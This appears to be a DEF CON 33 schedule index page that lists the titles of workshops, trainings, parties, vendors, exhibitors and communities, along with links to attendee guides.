Spotter – Universal Kubernetes Security Scanner and Policy Enforcer
Demolabs Info
Tengu Marauder v2
Demolabs Info
TheTimeMachine
Demolabs Info
Unmanned Wireless Penetration Testing Device
Demolabs Info
WarHead
Demolabs Info

DEF CON Workshops Table

Longer, more detailed, hands on, lasting half a day.
These have limited seating. These will fill up VERY quickly!

One Page All Workshops list with descriptions

defcon.org Workshops page

You may need to scroll to the right to see all info

64-bit Intel Assembly Language Programming for Hackers
Workshop Info
Accelerating Malware Analysis with WinDbg Time Travel Debugging
Workshop Info
Advanced Ghidra Scripting & Automation
Workshop Info
Analyzing and Creating Windows Shellcode for Hackers
Workshop Info
Cloud Forensics Workshop: Smart Grid Edition
Workshop Info
Contextualizing alerts with relevant logs and events without queries or LLMs
Workshop Info
Creating malicious functional app on Android
Workshop Info
Deep-dive into modern network fingerprinting
Workshop Info
Defeating Malware Evasion: Techniques and Countermeasures
Workshop Info
Disrupting Digital Dataflows: A 101 on how 2 detect, analyze, & disrupt digital systems by reverse engineering real-world Electronic Warfare techniques from Ukraine at the hardware level
Workshop Info
Dive into Windows Library Loading
Workshop Info
DIY Malware Emulation: Build It, Break It, Detect It
Workshop Info
Effectively Detecting Modern Malware with Volatility 3
Workshop Info
Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense
Workshop Info
EMMC BGA Secrets, hack bga memory, no reballing necessary: Learn how to safely remove EMMC memory modules, hack them and then reinstall, without the difficult process of trying to reball the BGA.
Workshop Info
Fine Tune your personal LLM assistant to Secure coding
Workshop Info
Fortifying AI: Hands-On Training in Adversarial Attacks and Defense of AI Systems
Workshop Info
From Prompt to Protection: A Practical Guide to Building and Securing Generative AI Applications
Workshop Info
Hacker VPN
Workshop Info
Hacking the connected plant: AI edition!
Workshop Info
Hacking The Metal: Into the GPU
Workshop Info
Hands-on IoT firmware extraction and flash forensics
Workshop Info
Hands-on Kubernetes Attack & Defense Masterclass
Workshop Info
Hands-On Threat Hunting with Wireshark
Workshop Info
Inside the Threat: Designing and Deploying Malicious Browser Extensions to Understand Their Risk
Workshop Info
Introduction to Cryptographic Attacks
Workshop Info
K8sploitation: Hacking Kubernetes the Fun Way
Workshop Info
Learning to Hack Bluetooth Low Energy with BLE CTF
Workshop Info
Medical Device Hacking: 201
Workshop Info
Obfuscation Reloaded: Modern Techniques for Evading Detection
Workshop Info
Open Source Malware 101 – Everything you always wanted to know about npm malware (and more)
Workshop Info
Pen-testing Cloud REST APIs
Workshop Info
PLC Playground: Hands-On Industrial Control Systems Attacks
Workshop Info
Practical YARA: Crafting Custom Rules for Targeted Malware Defense
Workshop Info
Provably exfiltrating data by breaking TLS in the right ways
Workshop Info
Putting EDRs in Their Place: Killing and Silencing EDR Agents
Workshop Info
Reach the Nirvana
Workshop Info
SnowGoat: Exposing Hidden Security Risks and Leaking Data Like a Threat Actor
Workshop Info
Whitebox Web Exploit Dev (WWED)
Workshop Info
Wi-Fi-So-Serious
Workshop Info

Paid Training Table

2 day training sessions on the Mon and Tue after DEF CON. There will be an additional cost for these.

One Page All Paid Training list with descriptions

DEF CON 33 Training Signup Pages

You may need to scroll to the right to see all info

A Complete Practical Approach to Malware Analysis & Threat Hunting Using Memory Forensics
Training Info
A Practical Approach to Breaking & Pwning Kubernetes Clusters
Training Info
Active Directory Attacks for Red and Blue Teams – Advanced Edition
Training Info
Advanced Cloud Incident Response in Azure and Microsoft 365
Training Info
Adversarial Thinking: The Art of Dangerous Ideas
Training Info
AI SecureOps: Attacking & Defending AI Applications and Services
Training Info
Attack and Defend Software Supply Chain
Training Info
Attacking & Securing CI/CD Pipeline Certification (ASCPC) by White Knight Labs
Training Info
Azure Cloud Attacks for Red & Blue Teams – Beginner Edition
Training Info
Beginner’s Guide to Attacks and Defenses
Training Info
BRIDGING THE GAP – An Introduction to IoT Security from Serial to Bluetooth
Training Info
Deep Dive into Fuzzing
Training Info
Dodging the EDR bullet: A Training on Malware Stealth Tactics
Training Info
Everyday Ghidra: Practical Windows Reverse Engineering
Training Info
Full-Stack Pentesting Laboratory: 100% Hands-On + Lifetime LAB Access
Training Info
Hack the Connected Plant!
Training Info
Hacking Cryptography: Attacks, Tools, and Techniques
Training Info
Hacking Modern Web Apps: Master the Future of Attack Vectors
Training Info
Hands-on Car Hacking & Automotive Cybersecurity
Training Info
Harnessing LLMs for Application Security
Training Info
Hunting for Hackers by Deloitte
Training Info
Influence Operations: Tactics, Defense, and Exploitation
Training Info
Loudmouth Security – Offensive IoT Exploitation
Training Info
Medical Device Penetration Testing
Training Info
Offensive Cyber Security Operations: Mastering Breach and Adversarial Attack Simulation Engagements
Training Info
Offensive Development Practitioner Certification (On-Site) by White Knight Labs
Training Info
RFID and Electronic Physical Access Control System Hacking
Training Info
Simulated Adversary: Tactics & Tools Training
Training Info
SOC 101 – SOC 1 Analyst Bootcamp
Training Info
Software Defined Radios 101
Training Info
Solving Modern Cybersecurity Problems with AI
Training Info
Windows Payload Development: EDR Evasion and Initial Access Tradecraft
Training Info

DC Party,Gather,Event Table

Various Parties, Gatherings, and Events

One Page All Parties, Gatherings, Events list with descriptions

defcon.org Parties, Meetups, and Events page

You may need to scroll to the right to see all info

+61: the Australian Embassy
Event Info
Arcade Party
Event Info
BIC Village Game Night
Event Info
BlanketFort Con
Event Info
Call Center Village Party
Event Info
Cyberdelia Rave
Event Info
Cycle Override
Event Info
Day of the Dead Hacker Party
Event Info
DC NextGen
Event Info
DC404/DC678/DC770/DC470 (Atlanta Metro) Meetup
Event Info
DC702 Meetup
Event Info
DEF CON Holland Group Presents: 
Drinking with the Dutch
Event Info
Friends of Bill W
Event Info
GOTHCON
Event Info
IoT Village 10th Birthday Party
Event Info
Lawyers Meet
Event Info
Queercon Mixer
Event Info
Spades Tournament & Game Night Social
Event Info
Sticker Swap at DEF CON 33
Event Info
The DEF CON Pool Party
Event Info
The Illuminati Party
Event Info
The Jasmine Dragon
Event Info
The KEVOPS Sellout Pool Party
Event Info
VETCON 2025 Party
Event Info
Women, gender non-conforming and non-binary meetup with The Diana Initiative
Event Info

DEF CON Vendors Table

List by name of the Vendors that will be in the Vendor area at DEF CON 33

One Page All Vendors list with descriptions

defcon.org Vendors page

Arts and Ent.
Vendor Info
Cryptocurrency Advocate
Vendor Info
deepnet LLC
Vendor Info
Electronic Cats
Vendor Info
Electronic Frontier Foundation (EFF)
Vendor Info
EXPLIoT
Vendor Info
FREE WiLi – Intrepid Control Systems Inc
Vendor Info
HackerBoxes
Vendor Info
HackerWarehouse
Vendor Info
Hak5 LLC
Vendor Info
iFixit
Vendor Info
Keyport
Vendor Info
Killchainz Clothing
Vendor Info
M2 Powered Partners LLC
Vendor Info
Mar Williams
Vendor Info
Midwest Gadgets LLC
Vendor Info
Miscreants, LLC
Vendor Info
No Starch Press, Inc
Vendor Info
Nuand LLC
Vendor Info
Octopwn GmbH
Vendor Info
PhysSec Education
Vendor Info
Rabbit-Labs
Vendor Info
Red Team Tools
Vendor Info
REKCAH Publishing
Vendor Info
Rogue’s Roost, LLC
Vendor Info
Rokland LLC
Vendor Info
Salty Security
Vendor Info
Shadowvex Industries
Vendor Info
SOK
Vendor Info
Sparrows Manufacturing Co
Vendor Info
The Calyx Institute
Vendor Info
The Open Organisation of Lockpickers (TOOOL)
Vendor Info
The Tor Project, Inc.
Vendor Info
Women in Security and Privacy
Vendor Info
Xcape, Inc.
Vendor Info

DEF CON Exhibitors Table

List by name of the Exhibitors that will be in the Exhibitor area at DEF CON 33

One Page All Exhibitors list with descriptions

defcon.org Exhibitors page

You may need to scroll to the right to see all info

Altered Security
Exhibitor Info
Authentik
Exhibitor Info
Black Hills
Exhibitor Info
Bugcrowd
Exhibitor Info
Capitol Technology University
Exhibitor Info
CISA
Exhibitor Info
Formal
Exhibitor Info
Hack The Box
Exhibitor Info
Promptfoo
Exhibitor Info
The SecOps Group
Exhibitor Info
Triad Secure
Exhibitor Info
US Army xTech
Exhibitor Info

DEF CON Communities Table

A group of people with common interests, but don’t qualify as a Village, is a Community,

One Page All Communities list with descriptions

defcon.org Communities page

You may need to scroll to the right to see all info

.edu Community
Community Info
Badgelife
Community Info
BBWIC Foundation
Community Info
Code Breaker
Community Info
Cryptocurrency Community
Community Info
DC Maker’s Community
Community Info
DC NextGen
Community Info
DDoS Community
Community Info
DEF CON Academy
Community Info
DEF CON Groups (DCG)
Community Info
DEF CON Groups VR (DCGVR)
Community Info
Friends of Bill W
Community Info
Hackers With Disabilities (HDA)
Community Info
Hackers.town
Community Info
Hard Hat Brigade
Community Info
Illumicon
Community Info
La Villa
Community Info
Lonely Hackers Club
Community Info
Loong Community
Community Info
Memorial Chamber
Community Info
Mobile Hacking Community
Community Info
Nix Vegas Community
Community Info
NMDP (formerly Be The Match)
Community Info
Noob Community
Community Info
Operating Systems Community
Community Info
OWASP
Community Info
Queercon Community Lounge
Community Info
Retro Tech Community
Community Info
The Diana Initiative
Community Info
The Diana Initiative’s Quiet Room
Community Info
VETCON
Community Info
Women in Security and Privacy (WISP)
Community Info

Links to DEF CON 33 related pages


Links

DEF CON . org Links

DEF CON Main page
DEF CON 33 Home Page
DEF CON FAQ
DEF CON Recent News
DEF CON 33 Venue
DEF CON 33 Training Signup
DEF CON 33 Contests
DEF CON CTF Nautilus Institute, Twitter @Nautilus_CTF
DEF CON 33 Villages
DEF CON 33 Communities
DEF CON 33 Parties, Meets, Events
DEF CON YouTube channel, prev years talks

DEF CON 33 Planning Forum page ( limited official use )


Thanks to the InfoBooth crew for providing access to their backend database. <claps> to their hard work!

Combined Schedules of DEF CON, Villages, and everything else DC33


Hacker Tracker - Android and IOS - the official DEF CON schedule app
The ONE! - A consolidated DEFCON 33 schedule in multiple file formats - html, PDF, CSV, ICAL, epub, mobi, Google calendar
info.defcon.org - the official DEF CON InfoBooth site


Other Interesting Links

DEF CON 33 Planning Highlights (URLs of note)
DEF CON Hackers with Disabilities Forum Topic - DC33 HDA for DC33 thread
@defconparties - calendar
defconmusic - Schedule/News from the DC Artists & Entertainment ( A&E ) Department
Official SoundTrack
DEFCONorg Twitch stream
defconmusic DEF CON Entertainment Twitch stream
defconmusic YouTube channel
DCTV - DEF CON TV: Twitch streams and Hotel TV channels
#badgelife spreadsheet of unofficial badges for DC33
@qumqats Twitter List of Village accounts to assist in watching Village happenings

Other cons during #SummerHackerCamp
Blackhat BS @BlackHatEvents @BlackHatEvents FB Black Hat Events
BSides Las Vegas BS @BSidesLV @BSidesLV FB @BSidesLV
The Diana Initiative BS @Dianainitiative @Dianainitiative FB @dianainitiative

Guides/Tips/FAQs

The Definitive Guide to DEF CON
DEF CON A&E - Resources - Rough Distances and Maps
DEF CON A&E - Resources - Packing List
Guide to Attending DEF CON 31
How to Survive Def Con 2022
OpSec For DEF CON 30
DCG 201 Hacker Double Summer 2023 Guides
Birds of a Feather-Resources for 2022 Hacker Summer Camp
Lonely Hackers Club - DEF CON n00b guide  -  reddit thread
The Lost Policymaker's Guide to Hacker Summer Camp
Holon DEF CON 30 Preparation
DEF CON: The Survival Guide
Preparing for "Hacker Summer Camp"

General / previous years
DEF CON for N00bs
JK-47 - BSidesLV & DEFCON Conference Tips
Just another DEF CON guide
HACKER SUMMER CAMP 2018 GUIDE
On Attending DefCon